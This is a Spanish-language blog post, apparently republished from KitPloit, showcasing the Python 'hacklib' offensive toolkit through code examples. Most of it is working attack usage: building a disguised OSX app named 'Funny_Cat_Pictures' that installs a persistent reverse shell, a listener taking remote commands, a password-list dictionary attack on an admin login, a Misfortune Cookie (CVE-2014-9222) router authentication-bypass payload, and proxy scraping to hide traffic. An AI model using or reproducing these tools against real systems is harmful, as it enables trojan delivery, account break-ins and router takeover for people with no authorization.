#hacklib: Pentesting, scanning de puertos y login por #Python

Un toolkit para aquellos entusiastas de Python

Hacklib es un módulo de Python para todos aquellos entusiastas interesados en la seguridad de las redes. Actualmente, se encuentra en activo desarrollo
Instalación
A través de línea de comando, (contando con pip) correr:

pip install hacklib

También posee una UI. Para usarla, solo hay que descargar hacklib.py:

python hacklib.py
----------------------------------------------
Hey. What can I do you for?


Enter the number corresponding to your choice.

1) Connect to a proxy
2) Target an IP or URL
3) Lan Scan
4) Create Backdoor
5) Server
6) Exit

Sino, con la librería se la puede invocar fácilmente:

import hacklib
hacklib.userInterface()

Dependencias
No todas las clases utilizan dependencias externas, pero por si acaso:

hacklib.installDependencies()

Ejemplos de uso 
Backdoor con shell inversa (solo para OSX):

import hacklib

bd = hacklib.Backdoor()
# Generates an app that, when ran, drops a persistent reverse shell into the system.
bd.create('127.0.0.1', 9090, 'OSX', 'Funny_Cat_Pictures')
# Takes the IP and port of the command server, the OS of the target, and the name of the .app

Una vez creada la aplicación maliciosa, dejamos un puerto a la escucha:

>>> import hacklib
>>> s = hacklib.Server(9090) # Bind server to port 9090
>>> s.listen() 
New connection ('127.0.0.1', 50011) # Target ran the app (connection retried every 60 seconds)
bash: no job control in this shell
bash$ whoami # Type a command
leon
bash$ # Nice!


Autenticación:

import hacklib

ac = hacklib.AuthClient()
# Logging into a gmail account
htmldata = ac.login('https://gmail.com', 'email', 'password')

# Check for a string in the resulting page
if 'Inbox' in htmldata: print 'Login Success.'
else: print 'Login Failed.'

# For logins using HTTP Basic Auth:
try: 
    htmldata = ac.login('http://somewebsite.com', 'admin', 'password')
except: pass #login failed

Ataques de diccionario utilizando AuthClient():

import hacklib

ac = hacklib.AuthClient()
# Get the top 100 most common passwords
passwords = hacklib.topPasswords(100)

for p in passwords:
    htmldata = ac.login('http://yourwebsite.com/login', 'admin', p)
    if htmldata and 'welcome' in htmldata.lower():
        print 'Password is', p
        break


Scanning de puertos:

from hacklib import *

ps = PortScanner()
ps.scan(getIP('yourwebsite.com'))
# By default scans the first 1024 ports. Use ps.scan(IP, port_range=(n1, n2), timeout=i) to change default

# After a scan, open ports are saved within ps for reference
if ps.portOpen(80):
    # Establish a TCP stream and sends a message
    send(getIP('yourwebsite.com'), 80, message='GET HTTP/1.1 \r\n')

Misfortune Cookie Exploit (CVE-2014-9222), utilizando PortScanner():

>>> import hacklib

# Discovery
>>> ps = hacklib.PortScanner()
>>> ps.scan('192.168.1.1', (80, 81))
Port 80:
HTTP/1.1 200
Content-Type: text/html
Transfer-Encoding: chunked
Server: RomPager/4.07 UPnP/1.0
EXT:
# The banner for port 80 shows us that the server uses RomPager 4.07. This version is exploitable.

# Exploitation
>>> payload = '''GET /HTTP/1.1
Host: 192.168.1.1
User-Agent: googlebot
Accept: text/html, application/xhtml+xml, application/xml; q=09, */*; q=0.8
Accept-Language: en-US, en; q=0.5
Accept-Encoding: gzip, deflate
Cookie: C107351277=BBBBBBBBBBBBBBBBBBBB\x00''' + '\r\n\r\n'
>>> hacklib.send('192.168.1.1', 80, payload)
# The cookie replaced the firmware's memory allocation for web authentication with a null bye.
# The router's admin page is now fully accessible from any web browser.


Autenticación FTP:

import hacklib
ftp = hacklib.FTPAuth('127.0.0.1', 21)
try:
    ftp.login('username', 'password')
except:
    print 'Login failed.'


Scrapping y tunneling en Socks4/5:

>>> import hacklib
>>> import urllib2
>>> proxylist = hacklib.getProxies() # scrape recently added socks proxies from the internet
>>> proxy = hacklib.Proxy()
>>> proxy.connect(proxylist) # automatically find and connect to a working proxy in proxylist
>>> proxy.IP
u'41.203.214.58'
>>> proxy.port
65000
>>> proxy.country
u'KE'
# All Python network activity across all modules are routed through the proxy:
>>> urllib2.urlopen('http://icanhazip.com/').read() 
'41.203.214.58\n'
# Notes: Only network activity via Python are masked by the proxy.
# Network activity on other programs such as your webbrowser remain unmasked.
# To filter proxies by country and type:
# proxylist = hacklib.getProxies(country_filter = ('RU', 'CA', 'SE'), proxy_type='Socks5')


Generación de diccionarios (word mangling):

from hacklib import *

word = Mangle("Test", 0, 10, 1990, 2016)

word.Leet()
word.Numbers()
word.Years()

Output:

T3$t
Test0
0Test
...snip...
Test10
10Test
Test1990
1990Test
...snip...
Test2016
2016Test


Creación de patrones:

from hacklib import *

Pattern = PatternCreate(100)

Pattern.generate()

Output:

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A


Uso de patrones de offset:

from hacklib import *

Offset = PatternOffset("6Ab7")

Offset.find()

Output:

[+] Offset: 50

Fuente: KitPloit

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s